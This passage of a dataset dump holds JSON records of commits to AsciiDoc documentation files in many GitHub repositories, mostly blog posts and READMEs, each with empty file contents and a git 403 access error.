403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49f2da874bef1e1c3e59e05abf4684680d7ce4f","subject":"Fixed icon size","message":"Fixed icon size\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76f407e1583241c09eee6658b63801a6717694ad","subject":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","message":"Update 2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_file":"_posts\/2016-03-27-JS1K-Attack-of-the-Mutant-Elements-demo-post-mortem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"578c09465291868f885c01d79b86cfbc28c72b32","subject":"Update 2016-01-20-Hello-and-welcome-to-my-blog.adoc","message":"Update 2016-01-20-Hello-and-welcome-to-my-blog.adoc","repos":"romanegunkov\/romanegunkov.github.io,romanegunkov\/romanegunkov.github.io,romanegunkov\/romanegunkov.github.io","old_file":"_posts\/2016-01-20-Hello-and-welcome-to-my-blog.adoc","new_file":"_posts\/2016-01-20-Hello-and-welcome-to-my-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/romanegunkov\/romanegunkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da8ea58f31569651cba8c4d917a469eb66cd304e","subject":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","message":"Update 2017-06-17-Validacao-versus-Verificacao.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_file":"_posts\/2017-06-17-Validacao-versus-Verificacao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90654048bf8d8922e70d041dfe4800b12c109a78","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dab0affca226b144d58809de55ef5a47efe53bd1","subject":"Documented the prefixes of html ids","message":"Documented the prefixes of html ids\n","repos":"uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"f7172eda35a74232be2c0f42894db8d376ce63ed","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69a49b176a14bf4e9046998f14a5597fb18f152c","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a3e258e6622afc9341b3482dcea624abc5447e7","subject":"Create Ruby.adoc","message":"Create Ruby.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Ruby.adoc","new_file":"Linux\/Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"654ad0908d80e95ce0d24ecfb12eadcdddc580b3","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ebcb77aa911aae76c48e717af24e643cb81908d","subject":"[docs] add Hive Metastore integration","message":"[docs] add Hive Metastore integration\n\nChange-Id: I12939c8f2245450ad46898c2050451b090c7ea01\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/11798\nTested-by: Kudu Jenkins\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Hao Hao <99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/hive_metastore.adoc","new_file":"docs\/hive_metastore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/helifu\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe1a5d57f36c356208c03fbf671bbdc8d6faafd5","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4479555d12025558c2af0252cca935443a82c3e","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8851e43e111eccd4c90609e824617cfc72cfb092","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"guppy4j\/libraries","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/guppy4j\/libraries.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55ab3e86d040d23bcf116c71f3296c45833bfdab","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8da07a49547ecd2bf0ad071f2908072a36a982e","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c0b54c793321f10b461a93893ab7ed3de217108","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c8b2f7acc65db11775f26fc6ab0d6613d83868f","subject":"Update 2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","message":"Update 2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","new_file":"_posts\/2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47cc7ed16c9e477b13b180493fcdd0bb15d3817","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86f1afe691d74d03545c46edc872a316fd8d703d","subject":"Fixes capitalization","message":"Fixes capitalization","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/04_further_reading.adoc","new_file":"src\/docs\/manual\/04_further_reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eedda7272ce867b20842b7c82061668e5ebe8f9f","subject":"Update 2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc","message":"Update 2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc\n","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc","new_file":"_posts\/2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85df42a4d7d8f9d07e7035617cb3192e0365b268","subject":"y2b create post $15 DIY Virtual Reality Headset!","message":"y2b create post $15 DIY Virtual Reality Headset!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-01-15-DIY-Virtual-Reality-Headset.adoc","new_file":"_posts\/2014-07-01-15-DIY-Virtual-Reality-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7157ff857883ec12ea7ac70c9d73f491f3ff68e6","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"187060e8f3f7c338ba78a8da4d780e49e6507c25","subject":"#467 Log entries page - documentation (skeleton)","message":"#467 Log entries page - documentation (skeleton)\n","repos":"nemerosa\/ontrack,flesire\/ontrack,flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack,nemerosa\/ontrack,nemerosa\/ontrack,flesire\/ontrack","old_file":"ontrack-docs\/src\/docs\/asciidoc\/admin-log-entries.adoc","new_file":"ontrack-docs\/src\/docs\/asciidoc\/admin-log-entries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flesire\/ontrack.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac4adb3f5a7e8a7a5fcceeb844764750f34d0fe9","subject":"Added missing asciidoc placeholder. Needed for TravisCI build","message":"Added missing asciidoc placeholder. Needed for TravisCI build\n","repos":"engagingspaces\/vertx-dataloader,graphql-java\/java-dataloader","old_file":"src\/main\/asciidoc\/index.adoc","new_file":"src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/engagingspaces\/vertx-dataloader.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81fdc99fb0c2a74936069d45a8d41f273a939de0","subject":"Polish doc","message":"Polish doc\n\nSee gh-3498\n","repos":"michael-simons\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,thomasdarimont\/spring-boot,shangyi0102\/spring-boot,kamilszymanski\/spring-boot,drumonii\/spring-boot,tsachev\/spring-boot,royclarkson\/spring-boot,bijukunjummen\/spring-boot,ptahchiev\/spring-boot,brettwooldridge\/spring-boot,izeye\/spring-boot,sebastiankirsch\/spring-boot,scottfrederick\/spring-boot,brettwooldridge\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,qerub\/spring-boot,mbogoevici\/spring-boot,NetoDevel\/spring-boot,yhj630520\/spring-boot,bjornlindstrom\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,jmnarloch\/spring-boot,jmnarloch\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,yangdd1205\/spring-boot,mosoft521\/spring-boot,bjornlindstrom\/spring-boot,afroje-reshma\/spring-boot-sample,mdeinum\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,joshthornhill\/spring-boot,ilayaperumalg\/spring-boot,brettwooldridge\/spring-boot,afroje-reshma\/spring-boot-sample,SaravananParthasarathy\/SPSDemo,philwebb\/spring-boot-concourse,kdvolder\/spring-boot,ihoneymon\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,jxblum\/spring-boot,i007422\/jenkins2-course-spring-boot,rweisleder\/spring-boot,chrylis\/spring-boot,rweisleder\/spring-boot,htynkn\/spring-boot,isopov\/spring-boot,izeye\/spring-boot,sebastiankirsch\/spring-boot,lucassaldanha\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,joshiste\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,kamilszymanski\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,candrews\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,vpavic\/spring-boot,minmay\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,DeezCashews\/spring-boot,pvorb\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,mdeinum\/spring-boot,htynkn\/spring-boot,ptahchiev\/spring-boot,RichardCSantana\/spring-boot,qerub\/spring-boot,mbogoevici\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,mosoft521\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,lucassaldanha\/spring-boot,qerub\/spring-boot,zhanhb\/spring-boot,lburgazzoli\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,yhj630520\/spring-boot,hello2009chen\/spring-boot,donhuvy\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,akmaharshi\/jenkins,joshiste\/spring-boot,candrews\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,mbogoevici\/spring-boot,shangyi0102\/spring-boot,ilayaperumalg\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,mbogoevici\/spring-boot,jmnarloch\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,lenicliu\/spring-boot,hello2009chen\/spring-boot,nebhale\/spring-boot,zhanhb\/spring-boot,sbcoba\/spring-boot,xiaoleiPENG\/my-project,mosoft521\/spring-boot,bbrouwer\/spring-boot,javyzheng\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,deki\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,NetoDevel\/spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,yhj630520\/spring-boot,bjornlindstrom\/spring-boot,michael-simons\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,wilkinsona\/spring-boot,mosoft521\/spring-boot,eddumelendez\/spring-boot,hello2009chen\/spring-boot,felipeg48\/spring-boot,bijukunjummen\/spring-boot,ihoneymon\/spring-boot,donhuvy\/spring-boot,joshthornhill\/spring-boot,deki\/spring-boot,deki\/spring-boot,lenicliu\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,vakninr\/spring-boot,yangdd1205\/spring-boot,neo4j-contrib\/spring-boot,akmaharshi\/jenkins,bclozel\/spring-boot,NetoDevel\/spring-boot,mbenson\/spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,wilkinsona\/spring-boot,hqrt\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,rweisleder\/spring-boot,philwebb\/spring-boot,afroje-reshma\/spring-boot-sample,olivergierke\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,pvorb\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,vakninr\/spring-boot,felipeg48\/spring-boot,NetoDevel\/spring-boot,vakninr\/spring-boot,cleverjava\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,mbogoevici\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,shangyi0102\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,minmay\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,deki\/spring-boot,lexandro\/spring-boot,jvz\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,tsachev\/spring-boot,kdvolder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,NetoDevel\/spring-boot,lucassaldanha\/spring-boot,aahlenst\/spring-boot,Nowheresly\/spring-boot,aahlenst\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,kamilszymanski\/spring-boot,herau\/spring-boot,isopov\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,olivergierke\/spring-boot,i007422\/jenkins2-course-spring-boot,nebhale\/spring-boot,linead\/spring-boot,linead\/spring-boot,linead\/spring-boot,habuma\/spring-boot,joshiste\/spring-boot,javyzheng\/spring-boot,lenicliu\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,ihoneymon\/spring-boot,jbovet\/spring-boot,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,candrews\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,joshthornhill\/spring-boot,javyzheng\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,bbrouwer\/spring-boot,bbrouwer\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,bjornlindstrom\/spring-boot,ptahchiev\/spring-boot,scottfrederick\/spring-boot,ollie314\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,jvz\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,Nowheresly\/spring-boot,sbcoba\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot-concourse,Buzzardo\/spring-boot,hello2009chen\/spring-boot,SaravananParthasarathy\/SPSDemo,chrylis\/spring-boot,shakuzen\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,minmay\/spring-boot,isopov\/spring-boot,joshthornhill\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,lucassaldanha\/spring-boot,thomasdarimont\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,sebastiankirsch\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,bclozel\/spring-boot,royclarkson\/spring-boot,neo4j-contrib\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot-concourse,shangyi0102\/spring-boot,htynkn\/spring-boot,zhanhb\/spring-boot,linead\/spring-boot,drumonii\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,herau\/spring-boot,DeezCashews\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,philwebb\/spring-boot,RichardCSantana\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,minmay\/spring-boot,jxblum\/spring-boot,Buzzardo\/spring-boot,vakninr\/spring-boot,bijukunjummen\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,donhuvy\/spring-boot,akmaharshi\/jenkins,Nowheresly\/spring-boot,jvz\/spring-boot,candrews\/spring-boot,joshiste\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,habuma\/spring-boot,lburgazzoli\/spring-boot,vpavic\/spring-boot,xiaoleiPENG\/my-project,philwebb\/spring-boot-concourse,mdeinum\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,javyzheng\/spring-boot,shakuzen\/spring-boot,linead\/spring-boot,htynkn\/spring-boot,afroje-reshma\/spring-boot-sample,olivergierke\/spring-boot,lexandro\/spring-boot,philwebb\/spring-boot,i007422\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,mosoft521\/spring-boot,thomasdarimont\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,Buzzardo\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lexandro\/spring-boot,tsachev\/spring-boot,minmay\/spring-boot,donhuvy\/spring-boot,isopov\/spring-boot,jbovet\/spring-boot,vpavic\/spring-boot,kamilszymanski\/spring-boot,jmnarloch\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,izeye\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,jayarampradhan\/spring-boot,mdeinum\/spring-boot,ollie314\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,isopov\/spring-boot,akmaharshi\/jenkins,sebastiankirsch\/spring-boot,mbenson\/spring-boot,jvz\/spring-boot,chrylis\/spring-boot,bijukunjummen\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,yangdd1205\/spring-boot,tiarebalbi\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jbovet\/spring-boot,spring-projects\/spring-boot,RichardCSantana\/spring-boot,lenicliu\/spring-boot,neo4j-contrib\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,sbcoba\/spring-boot,ptahchiev\/spring-boot,ollie314\/spring-boot,ilayaperumalg\/spring-boot,javyzheng\/spring-boot,pvorb\/spring-boot,lenicliu\/spring-boot,vpavic\/spring-boot,shangyi0102\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f921156d95ac00c8b52c6fcc7784f20f2b345bc6","subject":"Fixed readme md","message":"Fixed readme md\n","repos":"rmuhamedgaliev\/MPI-lab1,rmuhamedgaliev\/MPI-lab1","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab1.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c2aea0504cc5b5b513df48e615ab6572f2ab095","subject":"Ref #2779 Add missing README","message":"Ref #2779 Add missing README\n","repos":"fanf\/cf-clerk,ncharles\/cf-clerk,VinceMacBuche\/cf-clerk","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncharles\/cf-clerk.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"18aa52b72e16963a4417f41e5316a032017aced3","subject":"Added basic ReadMe document","message":"Added basic ReadMe 